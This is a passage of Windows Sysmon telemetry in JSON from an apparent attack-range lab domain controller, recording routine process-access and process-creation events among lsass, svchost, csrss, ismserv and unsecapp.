C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.928","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010BFBC0200}","TargetProcessId":"2856","TargetImage":"C:\\Windows\\System32\\ismserv.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1239,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.928\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010BFBC0200}\r\nTargetProcessId: 2856\r\nTargetImage: C:\\Windows\\System32\\ismserv.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.928","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010BFBC0200}","TargetProcessId":"2856","TargetImage":"C:\\Windows\\System32\\ismserv.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1240,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.931\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.931","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1241,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.931\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.931","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1242,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.931\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.931","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1243,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.938\r\nProcessGuid: {41C8662E-1F73-5F25-0000-0010B5CA0200}\r\nProcessId: 3160\r\nImage: C:\\Windows\\System32\\wbem\\unsecapp.exe\r\nFileVersion: 10.0.14393.2515 (rs1_release_1.180830-1044)\r\nDescription: Sink to receive asynchronous callbacks for WMI client application\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: unsecapp.dll\r\nCommandLine: C:\\Windows\\system32\\wbem\\unsecapp.exe -Embedding\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=2E49BB6C9F6599F518FE30BE2F000247,SHA256=20F499D581CF4AF331D8EC8B1E07A32CC1A695EF6790B51DA5EE223C5867154F,IMPHASH=A3CC49DF67C2278F822C9EBB9908BF09\r\nParentProcessGuid: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nParentProcessId: 612\r\nParentImage: C:\\Windows\\System32\\svchost.exe\r\nParentCommandLine: C:\\Windows\\system32\\svchost.exe -k DcomLaunch","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.938","ProcessGuid":"{41C8662E-1F73-5F25-0000-0010B5CA0200}","Image":"C:\\Windows\\System32\\wbem\\unsecapp.exe","FileVersion":"10.0.14393.2515 (rs1_release_1.180830-1044)","Description":"Sink to receive asynchronous callbacks for WMI client application","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"unsecapp.dll","CommandLine":"C:\\Windows\\system32\\wbem\\unsecapp.exe -Embedding","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=2E49BB6C9F6599F518FE30BE2F000247,SHA256=20F499D581CF4AF331D8EC8B1E07A32CC1A695EF6790B51DA5EE223C5867154F,IMPHASH=A3CC49DF67C2278F822C9EBB9908BF09","ParentProcessGuid":"{41C8662E-1F63-5F25-0000-0010C3650000}","ParentProcessId":"612","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k DcomLaunch","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1244,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.939\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010B5CA0200}\r\nTargetProcessId: 3160\r\nTargetImage: C:\\Windows\\system32\\wbem\\unsecapp.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.939","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010B5CA0200}","TargetProcessId":"3160","TargetImage":"C:\\Windows\\system32\\wbem\\unsecapp.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1245,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.940\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010B5CA0200}\r\nTargetProcessId: 3160\r\nTargetImage: C:\\Windows\\system32\\wbem\\unsecapp.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.940","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010B5CA0200}","TargetProcessId":"3160","TargetImage":"C:\\Windows\\system32\\wbem\\unsecapp.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1246,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.947\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 